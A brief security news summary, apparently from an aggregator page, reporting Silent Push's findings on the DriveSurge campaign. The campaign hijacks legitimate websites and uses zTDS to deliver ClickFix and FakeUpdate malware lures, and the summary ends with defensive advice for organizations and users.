A threat actor called DriveSurge has compromised thousands of real websites and is using them to redirect visitors into malware traps. Silent Push says the actor operates as an initial access broker, using the zTDS traffic distribution system to decide whether each visitor sees a ClickFix lure that tricks them into running malicious PowerShell commands or a FakeUpdate page posing as browser updates for Chrome, Firefox, Edge, Safari and others; researchers also found macOS-targeting JavaScript and more than 80 malicious injection domains.
Why it matters: People can get infected just by visiting a legitimate site that has been silently hijacked, so the risk extends beyond obviously shady pages. Organizations should hunt for the identified JavaScript injection patterns and domains, and users should only update browsers through the built-in updater and never paste commands from pop-ups into Terminal or PowerShell.
Bill Toulas
2026.06.01
100% relevant
This article appears to be the first tracked item establishing Silent Push's reporting on the DriveSurge campaign, its use of zTDS, and its large-scale website hijacking for ClickFix and FakeUpdate malware delivery.
← Back to all stories